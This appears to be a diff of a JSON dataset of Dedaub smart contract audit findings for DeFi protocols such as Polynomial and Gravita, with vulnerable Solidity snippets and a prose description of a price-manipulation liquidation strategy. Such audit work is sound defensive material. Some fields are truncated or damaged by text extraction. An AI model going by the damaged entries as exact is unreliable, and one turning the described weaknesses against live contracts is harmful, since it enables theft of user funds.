should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have centralization threats.) ID Description N1 Owner can set parameters with financial impact ", "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", "body": " DISMISSED The owner of both the BAMM contract and the GemSeller contract can set several parameters with financial impact. None is a major threat: the principal deposited by the Chicken Bonds protocol is safe, even if the owner of BAMM is malicious. 
However, some funds are at threat. Specifically: (BAMM) Owners can set the chicken address. The chicken address holds considerable control over the protocol, as it is the only address permitted to withdraw or deposit funds in the system. However, since this address can only ever be set once, the risk posed is limited. Once this address is set to the ChickenBondManager contract from the LUSD Chicken Bonds Protocol, this will no longer be an issue, as ChickenBondManager is itself very decentralized. (BAMM) Owners can set the gemSeller address. This is a centralization threat because gemSeller has infinite approval for gem, in this case LQTY. However, this means that a malicious owner can only steal rewards, not principal. Furthermore, the gemSellerController makes use of a time lock system. This prevents the owner from immediately changing the address of the gemSeller. A new address will first be stored as pending, and can only be set as the new gemSeller after a fixed time period has elapsed. Once set, the gemSeller has maximum approval for all LQTY held in the B.AMM. (BAMM and gemSeller) Owners can set parameters, including fee and A. The fee parameter is a threat, but is bounded by a maximum value (1% in BAMM, 10% in gemSeller). The A parameter only affects the discount given to buyers, which is bounded by a maximum, limiting the effect of any changes. OTHER/ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", "B.Protocol - Chicken Bonds", "Severity: Medium" ] }, { "title": "in BAMM::constructor parameter ", "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", "body": " RESOLVED Parameter address _fronEndTag should be address _frontEndTag.", "labels": [ "Dedaub", "B.Protocol - Chicken Bonds", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Liquity/B.Protocol - Chicken Bonds Audit.pdf", "body": "function names when converting LUSD RESOLVED The functions gemSeller::gemToLUSD and gemSeller::LUSDToGem convert the given quantity of gem tokens to their LUSD value and vice versa. However, the functions both return the USD price of the gem asset, not the LUSD price (more accurately, the GEM-ETH and ETH-USD prices are used together). Although the protocol assumes that 1 LUSD is always equivalent to 1 USD, gemSeller::gemToUSD and gemSeller::USDToGem would be more accurate function names. A3 Compiler bugs INFO The code is compiled with Solidity 0.6.11. This version of the compiler has some known bugs, which we do not believe to affect the correctness of the contracts. 
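The pending-then-set flow described above for the gemSeller address is a standard two-step timelock. The following is a minimal illustrative sketch of that pattern; the delay value, variable names and owner handling are assumptions, not the audited gemSellerController implementation.

pragma solidity ^0.8.0;

// Illustrative two-step timelocked setter in the spirit of the
// gemSellerController described above; all names and the delay are assumed.
contract GemSellerControllerSketch {
    uint256 public constant SET_DELAY = 7 days; // assumed delay
    address public owner = msg.sender;
    address public gemSeller;
    address public pendingGemSeller;
    uint256 public pendingSince;

    // Step 1: the new address is only recorded as pending.
    function proposeGemSeller(address newGemSeller) external {
        require(msg.sender == owner, "not owner");
        pendingGemSeller = newGemSeller;
        pendingSince = block.timestamp;
    }

    // Step 2: it becomes active only after the fixed period has elapsed,
    // giving users time to react before the new gemSeller gets approval.
    function applyGemSeller() external {
        require(msg.sender == owner, "not owner");
        require(pendingGemSeller != address(0), "nothing pending");
        require(block.timestamp >= pendingSince + SET_DELAY, "timelocked");
        gemSeller = pendingGemSeller;
        pendingGemSeller = address(0);
    }
}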
", "labels": [ "Dedaub", "B.Protocol - Chicken Bonds", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Solid World/Solid World Audit - May '23.pdf", "body": "Stake event does not capture the msg.sender WONT FIX The SolidStaking Stake event captures the recipient account but not the msg.sender, thus this piece of information is not recorded if the recipient is not also the msg.sender. 
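A sketch of the richer event the finding suggests. The exact parameter list of SolidStaking's Stake event is not reproduced in the finding, so every field other than sender is an assumption.

pragma solidity ^0.8.0;

// Sketch only: an event that records both the caller and the recipient,
// as the finding recommends. Field names/types besides `sender` are assumed.
interface ISolidStakingEvents {
    event Stake(
        address indexed sender,    // msg.sender that performed the stake
        address indexed recipient, // account credited with the stake
        address indexed asset,
        uint256 amount
    );
}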
A2 LiquidityDeployer::getTokenDepositors can be optimized to save gas WONT FIX The function LiquidityDeployer::getTokenDepositors copies the depositors array from storage to memory by performing a loop over each element of the array instead of just returning the array. LiquidityDeployer::getTokenDepositors function getTokenDepositors() external view returns (address[] memory tokenDepositors) { tokenDepositors = new address[](depositors.tokenDepositors.length); for (uint i; i < depositors.tokenDepositors.length; i++) { tokenDepositors[i] = depositors.tokenDepositors[i]; } } By changing the code to: function getTokenDepositors() external view returns (address[] memory tokenDepositors) { return depositors.tokenDepositors; } the cost of calling getTokenDepositors is reduced by 33% and the deployment cost of the LiquidityDeployer is reduced by ~1.5%.", "labels": [ "Dedaub", "Solid World", "Severity: Informational" ] }, { "title": "validity of the index price, the funding rate and the mark price is not always checked by the caller ", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": " OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price that could be invalid in some cases. Nevertheless, the aforementioned functions do not revert in case the base asset price is invalid but return a tuple with the derived value and a boolean that denotes the derived value is invalid due to the base asset price being invalid. The callers of the functions are responsible for checking the validity of the returned values, a design which is valid and flexible as long as it is appropriately implemented. However, the function Exchange::_updateFundingRate does not check the validity of the funding rate value returned by getFundingRate, which could lead to an invalid funding rate getting registered, messing up the protocol's operation. At the same time ShortCollateral::liquidate does not check the validity of the mark price returned by Exchange's getMarkPrice. The chance that something will go wrong is significantly smaller with liquidate because each call to it is preceded by a call to the function maxLiquidatableDebt that checks the validity of the mark price.", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: High" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": "LP token price might be incorrect OPEN LiquidityPool::getTokenPrice, the function that computes the price of one LP token, might return an incorrect price under certain circumstances. Specifically, it is incorrectly assumed that if the skew is equal to 0 the totalMargin and usedFunds will always add up to 0. LiquidityPool::getTokenPrice() function getTokenPrice() public view override returns (uint256) { if (totalFunds == 0) { return 1e18; } uint256 totalSupply = liquidityToken.totalSupply() + totalQueuedWithdrawals; int256 skew = _getSkew(); if (skew == 0) { // Dedaub: Incorrect assumption that if skew == 0 then // totalMargin + usedFunds == 0 return totalFunds.divWadDown(totalSupply); } (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 totalValue = totalFunds; uint256 amountOwed = markPrice.mulWadDown(powerPerp.totalSupply()); uint256 amountToCollect = markPrice.mulWadDown(shortToken.totalShorts()); uint256 totalMargin = _getTotalMargin(); totalValue += totalMargin + amountToCollect; totalValue -= uint256((int256(amountOwed) + usedFunds)); return totalValue.divWadDown(totalSupply); } The accounting of LiquidityPool's queued orders is incorrect OPEN", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: High" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": "does not set the queuedPerpSize storage variable to 0 when an order of size sizeDelta + queuedPerpSize is submitted to the Synthetix Perpetual Market. Also, queuedPerpSize should be accounted for in the emitted SubmitDelayedOrder event. 
LiquidityPool::_placeDelayedOrder() function _placeDelayedOrder( int256 sizeDelta, bool isLiquidation ) internal { PerpsV2MarketBaseTypes.DelayedOrder memory order = perpMarket.delayedOrders(address(this)); (,,,,, IPerpsV2MarketBaseTypes.Status status) = perpMarket.postTradeDetails(sizeDelta, 0, IPerpsV2MarketBaseTypes.OrderType.Delayed, address(this)); int256 oldSize = order.sizeDelta; if (oldSize != 0 || isLiquidation || uint8(status) != 0) { queuedPerpSize += sizeDelta; return; } perpMarket.submitOffchainDelayedOrderWithTracking( sizeDelta + queuedPerpSize, perpPriceImpactDelta, synthetixTrackingCode ); // Dedaub: queuedPerpSize should be set to 0 here // Dedaub: The below line should be: // emit SubmitDelayedOrder(sizeDelta + queuedPerpSize); emit SubmitDelayedOrder(sizeDelta); }", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: High" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": "mark price is susceptible to manipulation OPEN The mark price depends on the total sizes of the long and short positions. ShortCollateral::canLiquidate and maxLiquidatableDebt use the mark price to compute the value of the position and to check if the collateralization ratio is above the liquidation limit or not. An adversary could open a large short position to increase the mark price and therefore decrease the collateral ratio of all the positions and possibly make some of them undercollateralized. 
The adversary would then proceed by calling Exchange's liquidate function to liquidate the underwater position(s) and get the liquidation bonus before finally closing their short position.", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: High" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": "of usedFunds and totalFunds is incorrect OPEN The LiquidityPool contract uses two storage variables to track its available balance, usedFunds and totalFunds. As one would expect, these two variables get updated when a position is open or closed, i.e., when functions openLong, openShort, closeLong and closeShort are called. Incoming (openLong and closeShort) and outgoing (openShort and closeLong) funds for the position must be considered together with funds needed for fees. There are 3 types of fees: trading fees attributed to the LiquidityPool, fees required to open an offsetting position in the Synthetix Perp Market, which are called hedgingFees, and a protocol fee, externalFee. The accounting of all these values is rather complex and ends up being incorrect in all four aforementioned functions. Let's take the closeLong function as an example. In closeLong there are no incoming funds and the outgoing funds are the sum of the totalCost, the externalFee and the hedgingFees. 
However, the usedFunds are actually increased by tradeCost or totalCost+tradingFee+externalFee+hedgingFees, while hedgingFees are also added to usedFunds in the _hedge function. Thus, there are two issues: (1) hedgingFees are accounted for twice and (2) tradingFee is added when it should not be. LiquidityPool::closeLong() function closeLong(uint256 amount, address user, bytes32 referralCode) external override onlyExchange nonReentrant returns (uint256 totalCost) { (uint256 markPrice, bool isInvalid) = getMarkPrice(); require(!isInvalid); uint256 tradeCost = amount.mulWadDown(markPrice); uint256 fees = orderFee(-int256(amount)); totalCost = tradeCost - fees; SUSD.safeTransfer(user, totalCost); uint256 hedgingFees = _hedge(-int256(amount), false); uint256 feesCollected = fees - hedgingFees; uint256 externalFee = feesCollected.mulWadDown(devFee); SUSD.safeTransfer(feeReceipient, externalFee); // Dedaub: usedFunds is incremented by tradeCost, where // tradeCost = totalCost + fees, // fees = feesCollected + hedgingFees and // feesCollected = tradingFee + externalFee usedFunds += int256(tradeCost); emit RegisterTrade(referralCode, feesCollected, externalFee); emit CloseLong(markPrice, amount, fees); } The functions openLong, openShort and closeShort suffer from similar issues. H6 There might not be enough incentives for liquidators to liquidate unhealthy positions OPEN Collateralized short positions opened via the Exchange can get liquidated. For a liquidatable position of size N the liquidator has to give up N PowerPerp tokens for an amount of short collateral tokens equaling the value of the position plus a liquidation bonus. Thus, a user/liquidator is incentivized to liquidate a losing position instead of just closing their position, as they will get a liquidation bonus on top of what they would otherwise get. However, the liquidator might not always get paid an amount of short collateral tokens equaling the value of the position plus a liquidation bonus, according to the following condition in function ShortCollateral::liquidate: ShortCollateral::liquidate() totalCollateralReturned = liqBonus + collateralClaim; if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; As can be seen, if the value of the position plus the liquidation bonus, or totalCollateralReturned, is greater than the position's collateral, the liquidator gets just the position's collateral. This means that if during a significant price increase liquidations do not happen fast enough, certain losing positions will not be liquidatable for a profit, as the collateral's value will be less than that of the long position that needs to be closed. However, such a market is not healthy and this is reflected in the mark price, which lies in the center of the protocol. To avoid such scenarios (1) the collateralization ratios need to be chosen carefully while taking into account the squared nature of the perps and (2) an emergency fund should be implemented, which will be able to chip in when a position's collateral is not enough to incentivize its liquidation. MEDIUM SEVERITY: ", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: High" ] }, { "title": "are not able to set a minimum amount of collateral that they expect from a liquidation ", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": " OPEN Function Exchange::_liquidate does not require that totalCollateralReturned, i.e., the collateral awarded to the liquidator, is greater than a liquidator-specified minimum, thus in certain cases the liquidator might get back less than what they expected (as mentioned in issue H6). This might happen because the collateral of the position is not enough to cover the liquidation's theoretical collateral claim (bad debt scenario) plus the liquidation bonus. As can be seen in the below snippet of ShortCollateral's liquidate function, the totalCollateralReturned will be at most equal to the collateral of the specific position. 
ShortCollateral::liquidate() function liquidate(uint256 positionId, uint256 debt, address user) external override onlyExchange nonReentrant returns (uint256 totalCollateralReturned) { // Dedaub: Code omitted for brevity uint256 collateralClaim = debt.mulDivDown(markPrice, collateralPrice); uint256 liqBonus = collateralClaim.mulWadDown(coll.liqBonus); totalCollateralReturned = liqBonus + collateralClaim; // Dedaub: This if statement can reduce totalCollateralReturned to // something smaller than expected by the liquidator if (totalCollateralReturned > userCollateral.amount) totalCollateralReturned = userCollateral.amount; userCollateral.amount -= totalCollateralReturned; // Dedaub: Code omitted for brevity }", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: Medium" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": "funds are not optimally managed OPEN Function KangarooVault::_clearPendingOpenOrders determines if the previous open order has been successfully executed or has been canceled. In case the order has been canceled, the opposite exchange order is closed and the KangarooVault position data are adjusted to how they were before opening the order. However, the margin transferred to the Synthetix Perpetual Market, which was required for the position, is not revoked, meaning that the KangarooVault funds are not optimally managed. At the same time, when a pending close order's execution is confirmed in the function _clearPendingCloseOrders, the margin deposited to the Synthetix Perpetual Market is not reduced accordingly except when positionData.shortAmount == 0. The KangarooVault funds could also be suboptimally managed because the function KangarooVault::_openPosition does not take into account the already available margin when calculating the margin needed for a new open order. If the already opened position has available margin the KangarooVault could use part of that for its new order and transfer less than what would be needed if there was no margin available.", "labels": [ "Dedaub", "Polynomial Power Perp Contracts", "Severity: Medium" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", "body": "and KangarooVault could be susceptible to bank runs OPEN The LiquidityPool and KangarooVault contracts could be susceptible to bank runs. As these two contracts can use up to their whole available balance, liquidity providers might rush to withdraw their deposits when they feel that they might not be able to withdraw for some time. At the same time, depositors would rush to withdraw if they 
Power users (or protocols that integrate with the LiquidityPool) are expected to use the withdraw function, which oers immediate withdrawals for a small fee, while casual users that use the web UI will use the queueWithdraw function, which queues the withdrawal so it can be processed at a later time.", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/GYSR/GYSR - Mar '23.pdf", - "body": "comment in OwnerController RESOLVED The OwnerController contract provides functionality for the rest of the protocol contracts to manage their owners and their controllers. However, while the comments of the transferOwnership() function state that the owner can renounce ownership by transferring to address(0), this is not possible with the current code as it reverts when the newOwner address is 0. OwnerController::transferOwnership() /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * This can include renouncing ownership by transferring to the zero * address. Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual override { 1 requireOwner(); require(newOwner != address(0), \"oc3\"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } A5 Compiler bugs INFO The code is compiled with Solidity 0.8.18. Version 0.8.18, at the time of writing, has no known bugs. 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "ER", "labels": [ "Dedaub", - "GYSR - Mar '23", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { - "title": "does not check if it is overwriting a previous queued oracle ", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": " RESOLVED (not applicable as of e4fbfc30) In PriceFeed::addOracle, the queuedOracles entry for the token is wrien without checking whether it is zero. This is only a problem in case the controller makes a mistake, but the presence of a deleteQueuedOracle function suggests that the right behavior for a controller would be to delete a queued oracle if its no longer valid. function addOracle(address _token, address _chainlinkOracle, bool _isEthIndexed) external override isController { AggregatorV3Interface newOracle = AggregatorV3Interface(_chainlinkOracle); _validateFeedResponse(newOracle); if (registeredOracles[_token].exists) { uint256 timelockRelease = block.timestamp.add(_getOracleUpdateTimelock()); queuedOracles[_token] = OracleRecord(newOracle, timelockRelease, true, true, _isEthIndexed); } else { registeredOracles[_token] = OracleRecord(newOracle, block.timestamp, true, emit NewOracleRegistered(_token, _chainlinkOracle, _isEthIndexed); true, _isEthIndexed); } } function deleteQueuedOracle(address _token) external override isController { delete queuedOracles[_token]; }", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "in LiquidityPool::withdraw OPEN Function LiquidityPool::withdraw uses a plain ERC20 transfer without checking the returned value, which is an unsafe practice. 
It is recommended to always either use OpenZeppelin's SafeERC20 library or at least to wrap each operation in a require statement.", "labels": [ "Dedaub", - "Gravita", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Critical" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "timelock for adding oracles can be circumvented by deleting the previous oracle RESOLVED (not applicable as of e4fbfc30) On the same code as issue L1, in the PriceFeed contract, the controller can always subvert the above timelock by just deleting the registered oracle. function deleteOracle(address _token) external override isController { delete registeredOracles[_token]; } Thus, the timelock can only prevent accidents in the controller, and not provide assurances of having a delay for review of changes to oracles.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "withdrawal calculations in KangarooVault OPEN Function processWithdrawalQueue processes the KangarooVaults queued withdrawals. It rst checks if the available funds are suicient to cover the withdrawal. If not, a partial withdrawal is made and the records are updated to reflect that. The QueuedWithdraw.returnedAmount eld holds the value that has been returned to the 1 user thus far. However, it doesn't correctly account for partial withdrawals as the partial amount is being assigned to instead of being added to the variable. KangarooVault::processWithdrawalQueue() function processWithdrawalQueue( uint256 idCount ) external nonReentrant { for (uint256 i = 0; i < idCount; i++) { // Dedaub: Code omitted for brevity // Partial withdrawals if not enough available funds in the vault // Queue head is not increased if (susdToReturn > availableFunds) { // Dedaub: The withdrawn amounts should be accumulated in // current.returnedAmount = availableFunds; ... returnedAmount instead of being directly assigned } else { // Dedaub: Although this branch is for full withdrawals, there // // current.returnedAmount = susdToReturn; ... may have been partial withdrawals before, so the accounting should also be cumulative here } queuedWithdrawalHead++; } }", "labels": [ "Dedaub", - "Gravita", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "series of liquidations can cause the zeroing of totalStakes ACKNOWLEDGED The stake of a Vessel holding _asset as collateral is computed by the formula in VesselManager::_computeNewStake : stake = _coll.mul(totalStakesSnapshot[_asset]).div(totalCollateralSnapshot[_asset]); The stake is updated when the Vessel is adjusted and _coll is the new collateral amount of the Vessel and totalStakesSnapshot, totalCollateralSnapshot the total stakes and total collateral respectively right after the last liquidation. A liquidation followed by a redistribution of the debt and collateral to the other Vessels decreases the total stakes (the stake of the liquidated Vessel is just deleted and not shared among the others) and the total collateral (if we ignore the fees) does not change. Therefore the ratio in the above formula is constantly decreasing after each liquidation followed by redistribution and each new Vessel will get a relatively smaller stake. 
The nite precision of the arithmetic operations can lead to a zeroing of totalStakes, if a series of liquidations of Vessels with high stakes occurs. If this happens, the total stakes will be zero forever and each new vessel will be assigned a zero stake. If this happens many functionalities of the protocol are blocked i.e. the VesselManager::redistributeDebtAndCollateral will revert every time, since the debt and collateral to distribute are computed dividing by the (zero) totalStakes. The probability of such a problem is higher in Gravita, compared to Liquity, because Gravita allows multiple collateral assets, some of them, in principle, more volatile compared to ETH.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "exposure calculation may be inaccurate OPEN The Synthetix Perpetual Market has a two-step process for increasing/decreasing positions in which a request is submied and remains in a pending state until it is executed by a keeper. 1 LiquidityPool::_getExposure does not consider the queued Synthetix Perp position tracked by the queuedPerpSize storage variable meaning that LiquidityPool::getExposure will return an inaccurate value when called between the submission and the execution of an order. LiquidityPool::_getExposure() function _getExposure() internal view returns (int256 exposure) { // Dedaub: queuedPerpSize should be considered in currentPosition int256 currentPosition = _getTotalPerpPosition(); exposure = _calculateExposure(currentPosition); } LiquidityPool::rebalanceMargin does not consider queuedPerpSize too. The Polynomial team has mentioned that they plan to always call placeQueuedOrder before calling rebalanceMargin, thus adding a requirement that queuedPerpSize is equal to 0 would be enough to enforce that prerequisite. M8 LiquidityPool::_hedge always adds margin to OPEN Synthetix The function LiquidityPool::_hedge is responsible for hedging every position opened against the LiquidityPool by opening the opposite position in the Synthetix Perp Market. In doing so, _hedge transfers an amount of funds to the Synthetix Perp Market to be used as margin for the position. However, margin does not need to be increased always, e.g., it does not need to be increased when the Synthetix Perp position is decreased because the LiquidityPool is hedging a long Position and thus goes short. When the absolute position size of the LiquidityPool in the Synthetix Perp Market is decreased, the LiquidityPool could remove the unnecessary margin or abstain from increasing it to account for the rare case where a Synthetix order is not executed. This together with frequent calls to the rebalanceMargin function would help improve the capital eiciency of the LiquidityPool. 14 LOW SEVERITY: ", "labels": [ "Dedaub", - "Gravita", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Medium" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "could return arbitrarily stale prices, if Chainlink Oracles response is not valid RESOLVED (e4fbfc30) The protocol uses the PriceFeed::fetchPrice to get the price of a _token, whenever it needs to. This function rst calls the Chainlink oracle to get the price for this _token and then checks the validity of the response. If it is valid, it stores the answer in lastGoodPrice[_token] and also returns it to the caller. 
If the Chainlink response is not valid, then the function returns the value stored in lastGoodPrice[_token]. The problem is that this value could have been stored a long time ago and there is no check about this in the contract. As an edge case, if the Chainlink oracle does not give a valid answer, upon its rst call for a _token, then the PriceFeed::fetchPrice function will return a zero price. Liquity uses a secondary oracle, if the response of Chainlink is not valid, and only if both oracles fail, the stored last good price is being used, but in Gravita there is no secondary oracle. L5 AdminContract::sanitizeParameters has no access control RESOLVED (58a41195) The function sets important collateral data (to default values) yet has no access control, unlike, e.g., the almost-equivalent setAsDefault, which is onlyOwner. 1 Although there are many other safeguards that ensure that collateral is valid, we recommend tightening the access control for sanitizeParameters as well. function sanitizeParameters(address _collateral) external { if (!collateralParams[_collateral].hasCollateralConfigured) { _setAsDefault(_collateral); } } function setAsDefault(address _collateral) external onlyOwner { _setAsDefault(_collateral); } CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) ", + "title": "that use invalid values could be avoide ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " OPEN Functions getIndexPrice, getFundingRate and getMarkPrice of the Exchange contract depend on the externally provided base asset price that could be invalid in some cases. Even if the base asset price provided is invalid, a tuple (value, true) is returned where value is the value computed based on the invalid base asset price. However, if the base asset price is invalid, the tuple (0, true) could be returned while the whole computation is skipped to save gas unnecessarily spent on computing an invalid value.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Low" ] }, { - "title": "contracts can mint arbitrarily large amounts of debt tokens ", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": " INFO (acknowledged) The role of the whitelisted contracts is not completely clear to us. There is only one related comment in DebtToken.sol : // stores SC addresses that are allowed to mint/burn the token (AMO strategies,", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "critical requirement is enforced by dependency code OPEN Function Exchange::_openTrade, when called with params.isLong set to false and params.positionId dierent from 0, does not check that the msg.sender is the owner of the params.positionId short token position. This necessary requirement is later checked when ShortToken::adjustPosition is called. 
We would recommend adding such a require statement also as part of the function _openTrade, as it is the one querying the position. This would also add an extra safeguard against a future code change that accidentally removes the already existing require statement.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "mapping(address => bool) public whitelistedContracts; These contracts can mint debt tokens without depositing any collateral by calling DebtToken::mintFromWhitelistedContract. This could be a serious problem if such a contract were malicious. Also, even if these contracts work as expected, minting debt tokens without providing any collateral could have a serious impact on the price of the debt token. N2 Protocol owners can set crucial parameters INFO (acknowledged) Key functionality is trusted to the owner of various contracts. Owners can set the kinds of collateral accepted, the oracles that are used to price collateral, etc. Thus, protocol owners should be trusted by users. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "critical requirement is enforced by the ER", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { - "title": "struct Vessel (IVesselManager.sol), asset is unnecessary ", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": " INFO Field asset of struct Vessel is currently unused. Vessel records are currently only used in a mapping that has the asset as the key, so there is no need to read the asset from the Vessel data. In FeeCollector::_decreaseDebt no need to check for", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "OPEN In function LiquidityPool::closeLong, as in openShort, there is an outgoing flow of funds. However, there is no require statement checking the existence of the needed funds, as there is in the openShort function. Of course, if there are not enough funds to be transferred out of the LiquidityPool contract the ERC20 transfer code will cause a revert. Still, requiring that usedFunds<=0 || totalFunds>=uint256(usedFunds) makes the code more fail-safe. The same could be applied to function rebalanceMargin, where there is an outgoing flow of funds towards the Synthetix Perp Market.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Critical" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 
23.pdf", - "body": "fees if the expiration time of the refunding is block.timestamp INFO 1 In the code below if (mRecord.to < NOW) { } _closeExpiredOrLiquidatedFeeRecord(_borrower, _asset, mRecord.amount); < can be replaced by <=, since when mRecord == NOW, there is nothing left for the user to refund.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "critical requirement is enforced by callee code OPEN Function ShortCollateral::collectCollateral does not require that the provided collateral is approved (and matches the collateral of the already opened position). This could be problematic, i.e., a non-approved worthless collateral could be deposited instead, if every call to collectCollateral was not coupled with a call to getMinCollateral which enforces the aforementioned requirement. Implementing these requirements would constitute a step towards a more defensive approach, one that would make the system more bulletproof and robust even if the codebase continues to evolve and become more complicated.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "event INFO The following event is declared in IAdminContract.sol but not used anywhere: event MaxBorrowingFeeChanged(uint256 oldMaxBorrowingFee, uint256 newMaxBorrowingFee);", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "approvals cannot be revoked OPEN The ShortCollateral contract does not implement any functionality to revoke collateral approvals, meaning that the contract owner cannot undo even an incorrect approval and would need to redeploy the contract if that were to happen. Implementing such functionality would require a lot of care to ensure no funds (collateral) are trapped in the system, i.e., cannot be withdrawn, due to the collateral approval being revoked and the withdrawal functionality being operational only for approved collaterals.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "storage variables INFO The storage mapping StabilityPool::pendingCollGains and code accessing it are unnecessary since the information is never set to non-zero values. // Mapping from user address => pending collaterals to claim still // Must always be sorted by whitelist to keep leftSumColls functionality mapping(address => Colls) pendingCollGains; ... function getDepositorGains(address _depositor) public view returns (address[] memory, uint256[] memory) { // Add pending gains to the current gains return ( collateralsFromNewGains, _leftSumColls( Colls(collateralsFromNewGains, amountsFromNewGains), pendingCollGains[_depositor].tokens, pendingCollGains[_depositor].amounts ) ); } ... function _sendGainsToDepositor( 1 address _to, address[] memory assets, uint256[] memory amounts ) internal { ... 
